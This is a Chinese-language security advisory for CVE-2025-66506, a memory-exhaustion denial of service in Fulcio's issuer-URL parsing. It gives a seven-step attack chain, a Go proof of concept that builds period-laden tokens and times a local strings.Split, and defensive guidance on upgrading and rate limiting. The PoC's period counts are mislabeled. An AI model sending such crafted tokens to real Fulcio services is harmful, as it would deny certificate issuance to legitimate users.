CVE-2025-66506: Fulcio extractIssuerURL函数拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-66506

漏洞类型

拒绝服务（资源耗尽）

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

sigstore/fulcio

漏洞概述

Fulcio是一个开源的免费证书颁发机构，用于为OpenID Connect (OIDC)身份颁发代码签名证书。该漏洞存在于Fulcio 1.8.3之前的版本中，由于identity.extractIssuerURL函数在处理不受信任的输入时存在缺陷，导致潜在的安全风险。攻击者可以通过发送包含大量句点字符的恶意OIDC身份令牌来触发该漏洞，使得extractIssuerURL函数在执行strings.Split操作时产生过多的内存分配。这种内存分配与输入长度成正比（O(n)复杂度），常数因子约为16，意味着即使中等长度的恶意输入也可能导致显著的内存消耗，最终可能导致服务拒绝（DoS）状态。该漏洞于2025年12月4日披露，并在1.8.3版本中得到修复。

技术细节

漏洞根源在于identity.extractIssuerURL函数对用户提供的OIDC身份令牌中的issuer URL进行解析。该函数使用Go语言的strings.Split方法在句点字符上分割URL字符串。当攻击者构造一个包含大量句点（如数十个或数百个）的恶意URL时，strings.Split会创建大量临时字符串对象，导致内存分配量达到O(n)级别，其中n为输入字符串长度，常数因子约为16。例如，一个包含1000个句点的URL可能导致约16KB的内存分配，在高并发场景下会迅速耗尽系统资源。攻击者无需认证即可发送恶意请求，CVSS向量显示攻击复杂度低（AC:L），无需特殊权限（PR:N）或用户交互（UI:N），攻击向量为网络层面（AV:N）。虽然该漏洞主要影响可用性（A:H），但不会直接导致机密性（C:N）或完整性（I:N）问题。修复方案在1.8.3版本中通过优化字符串处理逻辑或添加输入长度限制来缓解该问题。

攻击链分析

STEP 1

步骤1

攻击者识别目标Fulcio实例，该实例运行1.8.3之前的版本

STEP 2

步骤2

攻击者构造包含大量句点字符的恶意OIDC身份令牌（如数百个连续句点）

STEP 3

步骤3

攻击者通过API或认证流程向Fulcio服务发送包含恶意令牌的请求

STEP 4

步骤4

Fulcio的extractIssuerURL函数接收到恶意令牌，调用strings.Split进行分割

STEP 5

步骤5

strings.Split操作产生O(n)字节的内存分配，常数因子约16，导致大量临时字符串对象创建

STEP 6

步骤6

在短时间内多次请求或高并发场景下，内存消耗急剧增加，可能导致服务崩溃或响应缓慢

STEP 7

步骤7

服务进入拒绝服务状态，合法用户无法获得代码签名证书

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-66506 PoC - Fulcio DoS via malicious OIDC token
// This PoC demonstrates sending a crafted OIDC token with excessive periods

package main

import (
    "fmt"
    "strings"
    "time"
)

// Vulnerable function from Fulcio (prior to 1.8.3)
func extractIssuerURL(token string) []string {
    // This split operation is vulnerable to memory exhaustion
    // when token contains many period characters
    return strings.Split(token, ".")
}

// Generate malicious token with excessive periods
func generateMaliciousToken(numPeriods int) string {
    var sb strings.Builder
    sb.WriteString("eyJ")
    for i := 0; i < numPeriods; i++ {
        sb.WriteString(strings.Repeat("a.", 100))
    }
    sb.WriteString("sign")
    return sb.String()
}

func main() {
    fmt.Println("CVE-2025-66506 PoC - Fulcio extractIssuerURL DoS")
    fmt.Println("===============================================")
    
    // Test with increasing numbers of periods
    testCases := []int{100, 500, 1000, 5000}
    
    for _, numPeriods := range testCases {
        maliciousToken := generateMaliciousToken(numPeriods)
        
        start := time.Now()
        result := extractIssuerURL(maliciousToken)
        elapsed := time.Since(start)
        
        fmt.Printf("Periods: %d | Result parts: %d | Time: %v\n", 
            numPeriods, len(result), elapsed)
    }
    
    fmt.Println("\n[!] Note: In production, this can cause memory exhaustion")
    fmt.Println("[!] Recommendation: Upgrade to Fulcio >= 1.8.3")
}

影响范围

sigstore/fulcio < 1.8.3

防御指南

临时缓解措施

如果无法立即升级到Fulcio 1.8.3，建议采取以下临时缓解措施：在API网关或负载均衡器层面限制OIDC令牌的URL字段长度（如限制在256字符以内）；对issuer URL中的句点数量设置上限（如不超过20个）；启用请求速率限制以减少恶意请求的影响；监控Fulcio服务的内存使用情况，设置告警阈值。同时建议尽快安排计划性维护，将Fulcio升级到1.8.3版本以彻底修复该漏洞。